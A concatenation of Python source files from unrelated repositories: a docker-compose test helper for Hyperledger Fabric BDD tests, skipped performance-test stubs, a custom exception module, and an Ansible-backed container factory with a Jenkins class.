def composing(self, composition, context):
pass
def decomposing(self, composition, context):
pass
def getEnv(self, composition, context, env):
pass
def GetDockerSafeUUID():
return str(uuid.uuid1()).replace('-','')
class Composition:
@classmethod
def RegisterCallbackInContext(cls, context, callback):
if not isinstance(callback, CompositionCallback):
raise TypeError("Expected type to be {0}, instead received {1}".format(CompositionCallback, type(callback)))
Composition.GetCompositionCallbacksFromContext(context).append(callback)
@classmethod
def GetCompositionCallbacksFromContext(cls, context):
if not "compositionCallbacks" in context:
context.compositionCallbacks = []
return context.compositionCallbacks
@classmethod
def GetUUID(cls):
return GetDockerSafeUUID()
def __init__(self, context, composeFilesYaml, projectName=None,
force_recreate=True, components=[], register_and_up=True):
self.contextHelper = ContextHelper.GetHelper(context=context)
if not projectName:
projectName = self.contextHelper.getGuuid()
self.projectName = projectName
self.context = context
self.containerDataList = []
self.composeFilesYaml = composeFilesYaml
self.serviceNames = []
self.serviceNames = self._collectServiceNames()
if register_and_up:
# Register with contextHelper (Supports docgen)
self.contextHelper.registerComposition(self)
[callback.composing(self, context) for callback in Composition.GetCompositionCallbacksFromContext(context)]
self.up(context, force_recreate, components)
def _collectServiceNames(self):
        'First collect the service names.'
servicesList = [service for service in self.issueCommand(["config", "--services"]).splitlines() if "WARNING" not in service]
return servicesList
def up(self, context, force_recreate=True, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["up", "-d"]
if force_recreate:
command += ["--force-recreate"]
self.issueCommand(command + components)
def scale(self, context, serviceName, count=1):
self.serviceNames = self._collectServiceNames()
command = ["scale", "%s=%d" %(serviceName, count)]
self.issueCommand(command)
def stop(self, context, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["stop"]
self.issueCommand(command, components)
def start(self, context, components=[]):
self.serviceNames = self._collectServiceNames()
command = ["start"]
self.issueCommand(command, components)
def getServiceNames(self):
return list(self.serviceNames)
    def parseComposeFilesArg(self, composeFileArgs):
        'Expand a whitespace-separated list of compose files/dirs into repeated "-f <file>" arguments.'
        files = [file if not os.path.isdir(file) else os.path.join(file, 'docker-compose.yml')
                 for file in composeFileArgs.split()]
        args = [arg for file in files for arg in ["-f", file]]
        return args
def getFileArgs(self):
return self.parseComposeFilesArg(self.composeFilesYaml)
def getEnvAdditions(self):
myEnv = {}
myEnv["COMPOSE_PROJECT_NAME"] = self.projectName
myEnv["CORE_PEER_NETWORKID"] = self.projectName
# Invoke callbacks
[callback.getEnv(self, self.context, myEnv) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
return myEnv
def getEnv(self):
myEnv = os.environ.copy()
for key,value in self.getEnvAdditions().iteritems():
myEnv[key] = value
# myEnv["COMPOSE_PROJECT_NAME"] = self.projectName
# myEnv["CORE_PEER_NETWORKID"] = self.projectName
# # Invoke callbacks
# [callback.getEnv(self, self.context, myEnv) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
return myEnv
def getConfig(self):
return self.issueCommand(["config"])
def refreshContainerIDs(self):
containers = self.issueCommand(["ps", "-q"]).split()
return containers
def _callCLI(self, argList, expect_success, env):
return bdd_test_util.cli_call(argList, expect_success=expect_success, env=env)
def issueCommand(self, command, components=[]):
componentList = []
useCompose = True
for component in components:
if '_' in component:
useCompose = False
componentList.append("%s_%s" % (self.projectName, component))
else:
break
# If we need to perform an operation on a specific container, use
# docker not docker-compose
if useCompose:
cmdArgs = self.getFileArgs()+ command + components
cmd = ["docker-compose"] + cmdArgs
else:
cmdArgs = command + componentList
cmd = ["docker"] + cmdArgs
#print("cmd:", cmd)
output, error, returncode = \
self._callCLI(cmd, expect_success=True, env=self.getEnv())
# Don't rebuild if ps command
if command[0] !="ps" and command[0] !="config":
self.rebuildContainerData()
return output
def rebuildContainerData(self):
self.containerDataList = []
for containerID in self.refreshContainerIDs():
# get container metadata
container = json.loads(bdd_test_util.cli_call(["docker", "inspect", containerID], expect_success=True)[0])[0]
# container name
container_name = container['Name'][1:]
# container ip address (only if container is running)
container_ipaddress = None
if container['State']['Running']:
container_ipaddress = container['NetworkSettings']['IPAddress']
if not container_ipaddress:
# ipaddress not found at the old location, try the new location
container_ipaddress = container['NetworkSettings']['Networks'].values()[0]['IPAddress']
# container environment
container_env = container['Config']['Env']
# container exposed ports
container_ports = container['NetworkSettings']['Ports']
# container docker-compose service
container_compose_service = container['Config']['Labels']['com.docker.compose.service']
self.containerDataList.append(ContainerData(container_name, container_ipaddress, container_env, container_compose_service, container_ports))
def decompose(self):
self.issueCommand(["unpause"])
self.issueCommand(["down"])
self.issueCommand(["kill"])
self.issueCommand(["rm", "-f"])
# Now remove associated chaincode containers if any
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["ps", "-qa", "--filter", "name={0}".format(self.projectName)], expect_success=True, env=self.getEnv())
for containerId in output.splitlines():
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["rm", "-f", containerId], expect_success=True, env=self.getEnv())
# Remove the associated network
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["network", "ls", "-q", "--filter", "name={0}".format(self.projectName)], expect_success=True, env=self.getEnv())
for networkId in output.splitlines():
output, error, returncode = \
bdd_test_util.cli_call(["docker"] + ["network", "rm", networkId], expect_success=True, env=self.getEnv())
# Invoke callbacks
[callback.decomposing(self, self.context) for callback in Composition.GetCompositionCallbacksFromContext(self.context)]
```
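A hedged sketch of how a behave step might drive the `Composition` helper above; the compose file name is a placeholder and the import assumes the step file lives next to `compose.py` in `bddtests/steps`:
```python
from behave import given
from compose import Composition
@given(u'I start the local docker composition')
def step_impl(context):
    # register_and_up defaults to True, so the services come up immediately.
    composition = Composition(context, "docker-compose.yml")
    for container in composition.containerDataList:
        print(container.containerName, container.ipAddress, container.ports)
    # A cleanup hook (e.g. after_scenario) can later call composition.decompose().
```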
#### File: regression/daily/test_pte.py
```python
import unittest
import subprocess
TEST_PASS_STRING="RESULT=PASS"
######################################################################
### LEVELDB
######################################################################
class LevelDB_Perf_Stress(unittest.TestCase):
@unittest.skip("skipping")
def test_FAB3584_SkeletonQueries(self):
'''
FAB-2032,FAB-3584
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
calculate tps, and remove network and cleanup
'''
# Replace TestPlaceholder.sh with actual test name, something like:
# ../../tools/PTE/tests/runSkeletonQueriesLevel.sh
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3586_SkeletonInvokes(self):
'''
FAB-2032,FAB-3586
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
query the ledger to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3593_Standard_basic_TLS(self):
'''
FAB-2032,FAB-3593
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3595_Standard_basic_1M(self):
'''
FAB-2032,FAB-3595
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3597_Standard_basic_Gossip(self):
'''
FAB-2032,FAB-3597
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3599_Standard_12Hr(self):
'''
FAB-2032,FAB-3599
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
######################################################################
### COUCHDB
######################################################################
class CouchDB_Perf_Stress(unittest.TestCase):
@unittest.skip("skipping")
def test_FAB3585_SkeletonQueries(self):
'''
FAB-2032,FAB-3585
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
send 10000 query transactions concurrently to 1 peer in both orgs,
calculate tps, and remove network and cleanup
'''
# Replace TestPlaceholder.sh with actual test name, something like:
# ../../tools/PTE/tests/runSkeletonQueriesCouch.sh
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3587_SkeletonInvokes(self):
'''
FAB-2032,FAB-3587
Network: 1 Ord, 1 KB, 1 ZK, 2 Org, 2 Peers, 1 Chan, 1 CC
Launch skeleton network, use PTE in STRESS mode to continuously
        send 10000 invoke transactions concurrently to 1 peer in both orgs,
query the ledger to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3588_Scaleup1(self):
'''
FAB-2032,FAB-3588
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 20 Chan, 2 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3589_Scaleup2(self):
'''
FAB-2032,FAB-3589
Network: 2 Ord, 5 KB, 3 ZK, 4 Org, 8 Peers, 40 Chan, 4 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3590_Scaleup3(self):
'''
FAB-2032,FAB-3590
Network: 2 Ord, 5 KB, 3 ZK, 8 Org, 16 Peers, 80 Chan, 8 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3591_Scaleup4(self):
'''
FAB-2032,FAB-3591
Network: 4 Ord, 5 KB, 3 ZK, 16 Org, 32 Peers, 160 Chan, 16 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3592_Scaleup5(self):
'''
FAB-2032,FAB-3592
Network: 4 Ord, 5 KB, 3 ZK, 32 Org, 64 Peers, 320 Chan, 32 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3594_Standard_basic_TLS(self):
'''
FAB-2032,FAB-3594
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3596_Standard_basic_1M(self):
'''
FAB-2032,FAB-3596
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3598_Standard_basic_Gossip(self):
'''
FAB-2032,FAB-3598
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send 100 invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
@unittest.skip("skipping")
def test_FAB3600_Standard_12Hr(self):
'''
FAB-2032,FAB-3600
Network: 2 Ord, 5 KB, 3 ZK, 2 Org, 4 Peers, 10 Chan, 10 CC
Launch network, use PTE stress mode to send invoke transactions
concurrently to all peers on all channels on all chaincodes,
query the ledger for each to ensure the last transaction was written,
calculate tps, remove network and cleanup
'''
result = subprocess.check_output("./TestPlaceholder.sh", shell=True)
self.assertIn(TEST_PASS_STRING, result)
``` |
{
"source": "jinlongwang/interpolation",
"score": 3
} |
#### File: jinlongwang/interpolation/myExcept.py
```python
class MyError(Exception):
pass
class ArgumentsException(MyError):
def __init__(self, msg):
self.msg = msg
def __str__(self):
return "argument error %s" % self.msg
``` |
{
"source": "JinlongWukong/DevLab-ansible",
"score": 2
} |
#### File: DevLab-ansible/container/__init__.py
```python
from .jenkins import Jenkins
from .mysql import Mysql
from .postgres import Postgres
from .container import Container
class ContainerFactory(object):
@staticmethod
def new_container(host_ip, host_user, host_pass, name, cpus, memory, container_type, version):
if container_type == 'jenkins':
return Jenkins(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type == 'mysql':
return Mysql(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type == 'postgres':
return Postgres(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
elif container_type in ['redis', 'mongodb', 'influxdb', 'prometheus', 'grafana']:
return Container(host_ip, host_user, host_pass, name, cpus, memory, container_type, version)
else:
raise TypeError("Unknown container type")
```
#### File: DevLab-ansible/container/jenkins.py
```python
from .container import Container
class Jenkins(Container):
def create(self):
"""
Jenkins specified create method, will parse initialAdminPassword
:return: container status(address, port_mapping, initial admin password), data format -> dict
"""
self.callback = self._create()
self.read_admin_password()
return {
"status": self.status,
"address": self.address,
"port_mapping": self.port_mapping,
"additional_infor": {"admin_password": <PASSWORD>} if self.initialAdminPassword else {}
}
def get(self):
"""Get jenkins status information
return: container status, address, port_mapping, format dict
"""
self.callback = self._get()
self.read_admin_password()
return {
"status": self.status,
"address": self.address,
"port_mapping": self.port_mapping,
"additional_infor": {"admin_password": <PASSWORD>} if self.initialAdminPassword else {}
}
def read_admin_password(self):
"""
Read jenkins initial admin password
"""
self.initialAdminPassword = ""
for event in self.callback.host_ok:
if event['task'] == "Get jenkins initialAdminPassword" and event['host'] == self.host_ip:
self.initialAdminPassword = event['result']['stdout']
else:
pass
``` |